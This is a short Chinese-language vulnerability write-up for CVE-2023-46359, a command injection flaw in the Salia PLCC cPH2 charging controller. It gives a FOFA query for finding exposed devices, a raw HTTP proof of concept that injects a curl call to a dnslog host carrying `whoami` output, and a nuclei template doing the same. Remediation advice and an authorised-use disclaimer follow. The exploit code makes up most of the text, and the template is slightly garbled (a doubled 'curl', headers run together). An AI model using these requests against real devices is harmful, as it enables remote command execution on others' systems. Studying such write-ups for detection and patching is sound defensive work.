漏洞描述
Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞,该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。
产品界面

fofa语法
"Salia PLCC"
POC
GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+http:%2F%2Fip.port.xxx.dnslog.pw/`whoami` HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0

nuclei验证
id: CVE-2023-46359info:name: Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)author: nobodyseverity: criticaldescription: |Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞,该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。impact: |攻击者可远程执行系统命令remediation: |升级版本,输入严格过滤metadata:verified: truemax-request: 3fofa-query: "Salia PLCC"tags: CVE-2023-46359requests:- raw:- |@timeout:20sGET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+curl+http:%2F%2F{{interactsh-url}} HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0matchers-condition: andmatchers:- type: wordpart: interactsh_protocolname: dnswords:- "dns"- type: wordpart: bodywords:- "SUCCESS"- type: statusstatus:- 200

修复建议
- 建议升级到最新版本
- 对输入传参做严格过滤
-
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!